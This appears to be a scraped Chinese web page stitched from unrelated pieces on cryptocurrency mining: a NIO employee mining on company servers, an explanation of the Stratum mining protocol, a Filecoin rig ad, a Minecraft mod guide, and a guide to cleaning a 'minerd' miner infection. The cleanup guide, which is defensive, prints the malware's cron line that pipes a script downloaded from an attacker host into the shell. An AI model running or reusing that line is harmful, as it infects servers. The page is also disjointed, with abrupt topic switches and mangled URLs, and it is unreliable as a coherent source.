蔚来员工利用公司服务器挖矿，你了解虚拟货币吗？

蔚来员工利用公司服务器挖矿，虚拟货币其实就是一种没有信用背书的商品，虚拟货币没有任何实在价值，它的价格都是通过炒作得来的。

蔚来员工利用公司服务器挖矿一年才被发现成了大家茶余饭后的谈资，不少人觉得这名员工做得很过分，毕竟这本身就是侵占了公司利益的一种行为。然而大家关注点更加在虚拟货币上，虚拟货币在去年年中的时候曾经有过一股下跌潮，随着马斯克在虚拟货币市场的退出，比特币等虚拟货币一下就跌到了上涨之前的水平，不少的人都站在了山顶上——风吹屁屁凉。实话说，虚拟货币的涨跌是由市场炒作者们追捧导致的，虚拟货币没有任何价值，我们千万要慎重投资。

蔚来员工利用公司服务器挖虚拟货币——以太币

近日，一名知名博主在网上曝光了蔚来一员工利用公司服务器挖矿的新闻。该员工利用自己担任集群网管理员的便利，他已经利用公司的计算机挖矿挖了一年多，等到风控部门发现的时候，公司已经因为他的盗用行为而有一定损失。他的行为不仅涉及违反公司规定，同时也涉及非法控制计算机系统罪，根据该公司合规管理部门的访谈，该员工对自己的违法行为供认不讳。其实这种挖以太币的行为是让人感到不解的，毕竟挖矿也可以自己挖，利用公司的网络挖完全没有这种必要，毕竟这是一种违法犯罪行为。

虚拟货币：本质上是一种没有信用背书的商品

 该员工涉及的虚拟货币叫做以太币，以太币是以太房弄出的一种虚拟货币，这种虚拟货币也是没有任何价值的。虚拟货币就是一种没有信用背书的一无所知的商品，按照虚拟货币的价格趋势我们可以发现：市场推动的时候虚拟货币价格就高，市场低潮的时候虚拟价格就低。总的来说，虚拟货币是受到市场推动影响而有价格波动的，虚拟货币并没有自身价，只可言虚拟货币的价格只是炒作出来的而已。

转自： https://zhuanlanzhihucom/p/23558268

getblocktemplate协议诞生于2012年中叶，此时矿池已经出现。矿池采用getblocktemplate协议与节点客户端交互，采用stratum协议与矿工交互，这是最典型的矿池搭建模式。

与getwork相比，getblocktemplate协议最大的不同点是：getblocktemplate协议让矿工自行构造区块。如此一来，节点和挖矿完全分离。对于getwork来说，区块链是黑暗的，getwork对区块链一无所知，他只知道修改data字段的4个字节。对于getblocktemplate来说，整个区块链是透明的，getblocktemplate掌握区块链上与挖矿有关的所有信息，包括待确认交易池，getblocktemplate可以自己选择包含进区块的交易。

挖矿有两种方式，一种叫SOLO挖矿，另一种是去矿池挖矿。前文所述的在节点客户端直接启动CPU挖矿，以及依靠getwork+cgminer驱动显卡直接连接节点客户端挖矿，都是SOLO挖矿，SOLO好比自己独资买**，不轻易中奖，中奖则收益全部归自己所有。去矿池挖矿好比合买**，大家一起出钱，能买一堆**，中奖后按出资比率分配收益。理论上，矿机可以借助getblocktemplate协议链接节点客户端SOLO挖矿，但其实早已没有矿工会那么做，在写这篇文章时，比特币全网算力1600P+，而当前最先进的矿机算力10T左右，如此算来，单台矿机SOLO挖到一个块的概率不到16万分之一，矿工（人）投入真金白银购买矿机、交付电费，不会做风险那么高的投资，显然投入矿池抱团挖矿以降低风险，获得稳定收益更加适合。因此矿池的出现是必然，也不可消除，无论是否破坏系统的去中心化原则。

矿池的核心工作是给矿工分配任务，统计工作量并分发收益。矿池将区块难度分成很多难度更小的任务下发给矿工计算，矿工完成一个任务后将工作量提交给矿池，叫提交一个share。假如全网区块难度要求Hash运算结果的前70个比特位都是0，那么矿池给矿工分配的任务可能只要求前30位是0（根据矿工算力调节），矿工完成指定难度任务后上交share，矿池再检测在满足前30位为0的基础上，看看是否碰巧前70位都是0。

矿池会根据每个矿工的算力情况分配不同难度的任务，矿池是如何判断矿工算力大小以分配合适的任务难度呢？调节思路和比特币区块难度一样，矿池需要借助矿工的share率，矿池希望给每个矿工分配的任务都足够让矿工运算一定时间，比如说1秒，如果矿工在一秒之内完成了几次任务，说明矿池当前给到的难度低了，需要调高，反之。如此下来，经过一段时间调节，矿池能给矿工分配合理难度，并计算出矿工的算力。

矿池通过getblocktemplate协议与网络节点交互，以获得区块链的最新信息，通过stratum协议与矿工交互。此外，为了让之前用getwork协议挖矿的软件也可以连接到矿池挖矿，矿池一般也支持getwork协议，通过阶层挖矿代理机制实现（Stratum mining proxy）。须知在矿池刚出现时，显卡挖矿还是主力，getwork用起来非常方便，另外早期的FPGA矿机有些是用getwork实现的，stratum与矿池采用TCP方式通信，数据使用JSON封装格式。

先来说一下getblocktemplate遗留下来的几个问题：

矿工驱动：在getblocktemplate协议里，依然是由矿工主动通过HTTP方式调用RPC接口向节点申请挖矿数据，这就意味着，网络最新区块的变动无法及时告知矿工，造成算力损失。

数据负载：如上所述，如今正常的一次getblocktemplate调用节点都会反馈回15M左右的数据，其中主要数据是交易列表，矿工与矿池需频繁交互数据，显然不能每次分配工作都要给矿工附带那么多信息。再者巨大的内存需求将大大影响矿机性能，增加成本。

Stratum协议彻底解决了以上问题。

Stratum协议采用主动分配任务的方式，也就是说，矿池任何时候都可以给矿工指派新任务，对于矿工来说，如果收到矿池指派的新任务，应立即无条件转向新任务；矿工也可以主动跟矿池申请新任务。

现在最核心的问题是如何让矿工获得更大的搜索空间，如果参照getwork协议，仅仅给矿工可以改变nNonce和nTime字段，则交互的数据量很少，但这点搜索空间肯定是不够的。想增加搜索空间，只能在hashMerkleroot下功夫，如果让矿工自己构造coinbase，那么搜索空间的问题将迎刃而解，但代价是必要要把区块包含的所有交易都交给矿工，矿工才能构造交易列表的Merkleroot，这对于矿工来说压力更大，对于矿池带宽要求也更高。

Stratum协议巧妙解决了这个问题，成功实现既可以给矿工增加足够的搜索空间，又只需要交互很少的数据量，这也是Stratum协议最具创新的地方。

再来回顾一下区块头的6个字段80字节，这个很关键，nVersion，nBits，hashPrevBlock这3个字段是固定的，nNonce，nTime这两个字段是矿工现在就可以改变的。增加搜索空间只能从hashMerkleroot下手，这个绕不过去。Stratum协议让矿工自己构造coinbase交易，coinbase的scriptSig字段有很多字节可以让矿工自由填充，而coinbase的改动意味着hashMerkleroot的改变。从coinbase构造hashMerkleroot无需全部交易，

如上图所示，假如区块将包含13笔交易，矿池先对这13笔交易进行处理，最后只要把图中的4个黑点（Hash值）交付给矿工，同时将构造coinbase需要的信息交付给矿工，矿工就可以自己构造hashMerkleroot（图中的绿点都是矿工自行计算获得，两两合并Hash时，规定下一个黑点代表的hash值总是放在右边）

。按照这种方式，假如区块包含N笔交易，矿池可以浓缩成log2(N)个hash值交付给矿工，这大大降低了矿池和矿工交互的数据量。

Stratum协议严格规定了矿工和矿池交互的接口数据结构和交互逻辑，具体如下：

1 矿工订阅任务

启动挖矿机器，使用miningsubscribe方法链接矿池

返回数据很重要，矿工需本地记录，在整个挖矿过程中都用到，其中：

Extranonce1，和 Extranonce2对于挖矿很重要，增加的搜索空间就在这里，现在，我们至少有了8个字节的搜索空间，即nNonce的4个字节，以及 Extranonce2的4个字节。

2 矿池授权

在矿池注册一个账号 ，添加矿工，矿池允许每个账号任意添加矿工数，并取不同名字以区分。矿工使用miningauthorize方法申请授权，只有被矿池授权的矿工才能收到矿池指派任务。

3 矿池分配任务

以上每个字段信息都是必不可少，其中：

有了以上信息，再加上之前拿到的Extranonce1 和Extranonce2_size，就可以挖矿了。

4 挖矿

1) 构造coinbase交易

用到的信息包括Coinb1, Extranonce1, Extranonce2_size 以及Coinb2，构造很简单：

为啥可以这样，因为矿池帮矿工做了很多工作，矿池已经构建了coinbase交易，系列化后在指定位置分割成coinb1和coinb2，coinb1和coinb2包含指定信息，比如coinb1包含区块高度，coinb2包含了矿工的收益地址和收益额等信息，但是这些信息对于矿工来说无关紧要，矿工挖矿的地方只是Extranonce2 的4个字节。另外Extranonce1是矿池写入区块的指定信息，一般来说，每个矿池会写入自己矿池的信息，比如矿池名字或者域名，我们就是根据这个信息统计每个矿池在全网的算力比重。

2) 构建Merkleroot

利用coinbase和merkle_branch，按照上图方式构造hashMerkleroot字段。

3) 构建区块头

填充余下的5个字段，现在，矿池可以在nNonce和Extranonce2 里搜索进行挖矿，如果嫌搜索空间还不够，只要增加Extranonce2_size为多几个字节就可轻而易举解决。

5 矿工提交工作量

当矿工找到一个符合难度的shares时，提交给矿池，提交的信息量很少，都是必不可少的字段：

矿池拿到以上5个字段后，首先根据任务号ID找出之前分配任务前存储的信息（主要是构建的coinbase交易以及包含的交易列表等），然后重构区块，再验证shares难度，对于符合难度要求的shares，再检测是否符合全网难度。

6 矿池给矿工调节难度

矿池记录每个矿工的难度，并根据shares率不断调节以指定合适难度。矿池可以随时通过miningset_difficulty方法给矿工发消息另其改变难度。

如上，Stratum协议核心理念基本解析清楚，在getblocktemplate协议和Stratum协议的配合下，矿池终于可以大声的对矿工说，让算力来的更猛烈些吧。

天下数据觉得我们可以从技术水平，品牌塑造等层面去考虑。

技术层面市场上绝大多数的矿工多多少少都存在一定的问题

如在一店家买来ipfs矿机，容积很小插不进去显卡，那样就务必要拆换主机箱也就是说购买外接的独立显卡的拓展，

那麼一些网络服务器的cpu还达不上规定，没办法去密封32G的扇区，因此就务必要更换cpu，

之后发现好一些的cpu必须拆换更高级的主板，还需要拆换主板，

因此类似这样的问题很多，原因就取决于绝大多项目投资的盆友，对Fliecoin的硬件配置并不是很了解。

再其次就是品牌背书了，在这次刚结束的太空竞赛第一阶段中，我们可以去查矿工们的排名，

在游戏选项控制里找到挖矿快捷键，开启使用相关的工具即可实现连锁挖矿。

《我的世界》中是有一个连锁挖矿模组的，这个模组可以让挖矿的速度大大提升，想要使用连锁挖矿模组需要先找到它，可以先在组件中心搜索连锁挖矿，然后安装连锁挖矿MOD，最好在MOD设置界面设置连锁挖矿MOD的开启方式，连锁挖矿的数量和可以挖的矿石，就可以直接去挖矿了。

搜索连锁挖矿模组，然后下载安装，最后在MOD界面设置挖矿MOD的开启方法、挖矿数量和可挖矿种类，就可以直接挖矿了。

《我的世界》（Minecraft）是一款沙盒类电子游戏，开创者为马库斯·阿列克谢·泊松（Notch）。游戏由Mojang Studios维护，现隶属于微软Xbox游戏工作室。

中国版现由网易游戏代理，于2017年8月8日在中国大陆运加入并负责开发之前，我的世界几乎全部的开发工作由Notch完成。游戏音乐由丹尼尔·罗森菲尔德（C418）和莉娜·雷恩（Lena Raine）创作；克里斯托弗·泽特斯特兰绘制了游戏中的画。

游戏最初于2009年5月17日作为Classic版本发布，并于2011年11月18日发布Java正式版。我的世界的游戏平台囊括桌面设备、移动设备和游戏主机。

该游戏以玩家在一个充满着方块的三维空间中自由地创造和破坏不同种类的方块为主题。玩家在游戏中可以在单人或多人模式中通过摧毁或创造精妙绝伦的建筑物和艺术，或者收集物品探索地图以完成游戏的成就（进度）。玩家也可以尝试在创造模式下(打开作弊)红石电路和指令等玩法。

2022年7月21日，微软旗下游戏开发商Mojang更新Minecraft（我的世界）使用指南，禁止将区块链技术集成到Minecraft客户端、服务器应用程序，也不允许利用区块链技术将Minecraft游戏内的内容（如世界、皮肤、角色物品或其他模组）用于创建相关NFT。

当然可以啦！

不过要选择可以Cpu挖矿的币。

1cpu挖矿的本身比较少了，比较有名的有：xmr，hsr等

2租用服务器的成本要考虑进去了。

挖矿基本没法他用了

1 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmrcrypto-poolfr -j DROP and iptables -A OUTPUT -d xmrcrypto-poolfr -j DROP

2 chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3 pkill minerd ,杀掉进程

4 service stop crond 或者 crontab -r 删除所有的执行计划

5 执行top，查看了一会，没有再发现minerd 进程了。

6检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

/5 curl -fsSL http://wwwhaveabitchincom/pmsh0105010 | sh

病毒文件内容如下，感兴趣的可以研究下：

 View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blogjobbolecom/94518/然后就注入了病毒，下面是解决办法和清除工作：

1 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2 打开 ~/ssh/authorized_keys, 删除你不认识的账号

3 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉

云挖矿怎么赚钱吗

云挖矿是一种通过云计算技术，租用远程服务器的算力来进行数字货币挖矿的方式。以下是关于云挖矿如何赚钱的详细解释：

1挖矿获得数字货币

在数字货币的挖矿过程中，矿工可以通过解决密码学难题来验证交易，获取新的数字货币作为奖励。云挖矿也是一种挖矿方式，租用远程服务器的算力来进行数字货币挖矿，可以获得数字货币奖励。

2赚取挖矿手续费

在数字货币交易过程中，每笔交易都需要支付一定的手续费，这些手续费将被矿工获得。如果你租用的服务器被分配到进行交易验证，你就可以获得一部分交易手续费。

3升值收益

如果你在挖矿时获得了一些数字货币，当这些数字货币在市场上价格上涨时，你可以通过出售它们获得升值收益。

需要注意的是，云挖矿的收益并不是稳定的，它会受到数字货币市场价格、难度调整以及挖矿设备等因素的影响。因此，投资者在考虑参与云挖矿时，需要仔细评估风险和潜在收益，并选择合适的云挖矿平台。